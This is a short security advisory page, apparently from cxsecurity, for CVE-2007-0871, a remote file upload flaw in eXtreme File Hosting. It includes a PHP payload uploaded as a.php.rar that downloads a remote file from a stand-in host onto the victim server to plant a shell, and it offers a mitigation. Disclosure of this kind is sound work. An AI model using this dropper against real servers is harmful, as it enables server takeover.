Bug: eXtreme File Hosting remote file upload vulnerability ( Ascii Version )

Search:
WLB2

eXtreme File Hosting remote file upload vulnerability

Published
Credit
Risk
2007.02.13
hamed bazargani
High
CWE
CVE
Local
Remote
N/A
CVE-2007-0871
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

A security bug have been discovered in eXtreme File Hosting, which can be upload the attaker files and can get the shell
with phpshell.

bug : in this borgram with php can user upload zip or rar file hacker can upload the a.php.rar file that contain

###########################
<?php
$file = 'http://sample.com/evile_file.php';
$newfile = 'evile_file.php';
if (!copy($file, $newfile)) {
echo "failed to copy $file...n";
}else{
echo "OK file copy in victim host";
}
?>
###########################

and upload it the click in download link then this file run and dont download
after run a.php.rar the evile_file.php copy in victim host and attacker can use for hacking server.

Solution: disable rar file uploading in setting
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
software: eXtreme File Hosting
site: http://www.extremepow.com
Reported By: : hamed bazargani (hamed.bazargani (at) gmail (dot) com [email concealed]) From I.R.IRAN and all iranian
whitehat hacker

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version